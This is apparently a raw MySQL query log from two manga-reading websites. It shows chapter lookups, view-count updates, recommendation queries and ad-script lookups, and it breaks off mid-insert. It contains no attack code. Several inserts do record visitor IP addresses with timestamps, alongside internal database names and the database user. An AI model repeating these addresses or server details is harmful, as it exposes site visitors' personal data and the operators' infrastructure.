Socket 330657790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657789 Quit 330657790 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17356' 330657790 Quit 330657791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657791 Query select * FROM chapters where id = '17356' 330657791 Quit 330657792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657792 Query select * FROM chapters where manga_id = '35' order by id desc 330657792 Quit 330657793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657793 Query Update chapters set view=view+1 where id = '17356' 330657793 Quit 330657794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657794 Query select * FROM chapters where id = '17356' 330657794 Quit 330657795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657795 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17356' 330657795 Quit 330657796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657796 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('35', '17356', '2401:4900:88f5:ef2f:8960:d4bc:ce6:bad7', 'mangacherri.com', '2026-02-26 03:29:49', '2026-02-26 03:29:49') 330657796 Quit 330657797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657797 Query select * FROM chapter_images where chapter_id = '17356' 330657797 Quit 330657798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657798 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '35' and m.active = 1 330657798 Quit 330657799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657799 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='35' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330657800 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657801 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657800 Quit 330657801 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1951' and m.active = 1 330657801 Quit 330657802 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657802 Query select * FROM chapters where id = '1951' 330657802 Quit 330657803 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657803 Query select * FROM chapters where manga_id = '100' order by display_priority ASC, id desc 330657803 Quit 330657804 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657804 Query Update chapters set view=view+1 where id = '1951' 330657804 Quit 330657805 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657805 Query select * FROM chapters where id = '1951' 330657805 Quit 330657806 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657806 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1951' and m.active = 1 330657806 Quit 330657807 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657807 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('100', '1951', '103.112.171.243', 'mangaberri.com', '2026-02-26 03:29:49', '2026-02-26 03:29:49') 330657807 Quit 330657808 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657808 Query select * FROM chapter_images where chapter_id = '1951' 330657808 Quit 330657809 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657809 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '100' and m.active = 1 330657809 Quit 330657810 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657810 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='100' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Shounen%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330657810 Quit 330657811 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657812 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657811 Quit 330657812 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657812 Quit 330657813 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657814 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657813 Quit 330657814 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657814 Quit 330657815 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657816 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657815 Quit 330657816 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657816 Quit 330657817 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657818 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657817 Quit 330657818 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657818 Quit 330657788 Quit 330657819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657819 Quit 330657820 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657820 Quit 330657821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657821 Quit 330657822 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657822 Quit 330657823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657823 Quit 330657824 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657824 Quit 330657825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657825 Quit 330657826 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657826 Quit 330657799 Quit 330657827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657827 Quit 330657828 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657828 Quit 330657829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657829 Quit 330657830 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657830 Quit 330657831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657831 Quit 330657832 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657832 Quit 330657833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657833 Quit 330657834 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657834 Quit 330657835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657835 Quit 330657836 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16874' 330657836 Quit 330657837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657837 Query select * FROM chapters where id = '16874' 330657837 Quit 330657838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657838 Query select * FROM chapters where manga_id = '339' order by id desc 330657838 Quit 330657839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657839 Query Update chapters set view=view+1 where id = '16874' 330657839 Quit 330657840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657840 Query select * FROM chapters where id = '16874' 330657841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657840 Quit 330657841 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16874' 330657841 Quit 330657842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657842 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('339', '16874', '2601:201:8d00:1d70:d11e:df72:8b88:5156', 'mangacherri.com', '2026-02-26 03:29:49', '2026-02-26 03:29:49') 330657842 Quit 330657843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657843 Query select * FROM chapter_images where chapter_id = '16874' 260225 19:29:50 330657844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657844 Quit 330657845 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10916' 330657845 Quit 330657846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657846 Query select * FROM chapters where id = '10916' 330657846 Quit 330657847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657847 Query select * FROM chapters where manga_id = '197' order by id desc 330657847 Quit 330657848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657848 Query Update chapters set view=view+1 where id = '10916' 330657848 Quit 330657849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657849 Query select * FROM chapters where id = '10916' 330657849 Quit 330657850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657850 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10916' 330657851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657850 Quit 330657851 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '10916', '50.86.212.22', 'mangacherri.com', '2026-02-26 03:29:50', '2026-02-26 03:29:50') 330657851 Quit 330657852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657852 Query select * FROM chapter_images where chapter_id = '10916' 330657852 Quit 330657853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657853 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330657853 Quit 330657854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657854 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330657843 Quit 330657855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657855 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '339' and m.active = 1 330657855 Quit 330657856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657856 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='339' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330657854 Quit 330657857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657857 Quit 330657858 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657858 Quit 330657859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657859 Quit 330657860 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657860 Quit 330657861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657861 Quit 330657862 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657862 Quit 330657863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657863 Quit 330657864 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657864 Quit 330657856 Quit 330657865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657865 Quit 330657866 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657866 Quit 330657867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657867 Quit 330657868 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657868 Quit 330657869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657869 Quit 330657870 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657870 Quit 330657871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657871 Quit 330657872 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657872 Quit 260225 19:29:51 330657873 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657874 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657873 Quit 330657874 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12934' and m.active = 1 330657874 Quit 330657875 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657875 Query select * FROM chapters where id = '12934' 330657875 Quit 330657876 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657876 Query select * FROM chapters where manga_id = '116' order by display_priority ASC, id desc 330657876 Quit 330657877 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657877 Query Update chapters set view=view+1 where id = '12934' 330657877 Quit 330657878 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657878 Query select * FROM chapters where id = '12934' 330657878 Quit 330657879 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657879 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12934' and m.active = 1 330657879 Quit 330657880 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657880 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('116', '12934', '122.179.91.40', 'mangaberri.com', '2026-02-26 03:29:51', '2026-02-26 03:29:51') 330657880 Quit 330657881 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657881 Query select * FROM chapter_images where chapter_id = '12934' 330657881 Quit 330657882 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657882 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '116' and m.active = 1 330657882 Quit 330657883 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657883 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='116' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Demons%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330657883 Quit 330657884 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657885 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657885 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657885 Quit 330657884 Quit 330657886 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657887 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657886 Quit 330657887 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657887 Quit 330657888 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657889 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657888 Quit 330657889 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657889 Quit 330657890 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657891 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657890 Quit 330657891 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657891 Quit 330657892 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657893 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657892 Quit 330657893 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '342' and m.active = 1 330657893 Quit 330657894 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657894 Query select * FROM chapters where id = '342' 330657894 Quit 330657895 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657895 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330657895 Quit 330657896 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657896 Query Update chapters set view=view+1 where id = '342' 330657896 Quit 330657897 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657897 Query select * FROM chapters where id = '342' 330657897 Quit 330657898 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657898 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '342' and m.active = 1 330657898 Quit 330657899 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657899 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '342', '140.248.5.135', 'mangaberri.com', '2026-02-26 03:29:51', '2026-02-26 03:29:51') 330657899 Quit 330657900 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657900 Query select * FROM chapter_images where chapter_id = '342' 330657900 Quit 330657901 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657901 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330657901 Quit 330657902 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657902 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330657902 Quit 330657903 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657904 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657903 Quit 330657904 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657904 Quit 330657905 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657906 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657905 Quit 330657906 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657906 Quit 330657907 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657908 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657907 Quit 330657908 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657908 Quit 330657909 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657910 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657909 Quit 330657910 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657910 Quit 330657911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657912 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5006' 330657911 Quit 330657912 Quit 330657913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657913 Query select * FROM chapters where id = '5006' 330657913 Quit 330657914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657914 Query select * FROM chapters where manga_id = '99' order by id desc 330657914 Quit 330657915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657915 Query Update chapters set view=view+1 where id = '5006' 330657915 Quit 330657916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657916 Query select * FROM chapters where id = '5006' 330657916 Quit 330657917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657917 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5006' 330657917 Quit 330657918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657918 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('99', '5006', '2a00:23ee:15d0:57fe:6454:7df4:b53e:fae7', 'mangacherri.com', '2026-02-26 03:29:51', '2026-02-26 03:29:51') 330657918 Quit 330657919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657919 Query select * FROM chapter_images where chapter_id = '5006' 330657919 Quit 330657920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657920 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '99' and m.active = 1 330657920 Quit 330657921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657921 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='99' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 260225 19:29:52 330657921 Quit 330657922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657922 Quit 330657923 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657923 Quit 330657924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657924 Quit 330657925 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657925 Quit 330657926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657927 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657926 Quit 330657927 Quit 330657928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657928 Quit 330657929 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657929 Quit 330657930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657931 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16371' 330657930 Quit 330657931 Quit 330657932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657932 Query select * FROM chapters where id = '16371' 330657932 Quit 330657933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657933 Query select * FROM chapters where manga_id = '327' order by id desc 330657933 Quit 330657934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657934 Query Update chapters set view=view+1 where id = '16371' 330657934 Quit 330657935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657935 Query select * FROM chapters where id = '16371' 330657936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657935 Quit 330657936 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16371' 330657936 Quit 330657937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657937 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('327', '16371', '97.105.132.3', 'mangacherri.com', '2026-02-26 03:29:52', '2026-02-26 03:29:52') 330657937 Quit 330657938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657938 Query select * FROM chapter_images where chapter_id = '16371' 330657938 Quit 330657939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657939 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '327' and m.active = 1 330657939 Quit 330657940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657940 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='327' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Office%' OR genres like '%Romance%' OR genres like '%Seinen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330657941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657941 Quit 330657942 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17682' 330657942 Quit 330657943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657943 Query select * FROM chapters where id = '17682' 330657943 Quit 330657944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657944 Query select * FROM chapters where manga_id = '346' order by id desc 330657944 Quit 330657945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657945 Query Update chapters set view=view+1 where id = '17682' 330657945 Quit 330657946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657946 Query select * FROM chapters where id = '17682' 330657946 Quit 330657947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657947 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17682' 330657947 Quit 330657948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657948 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) 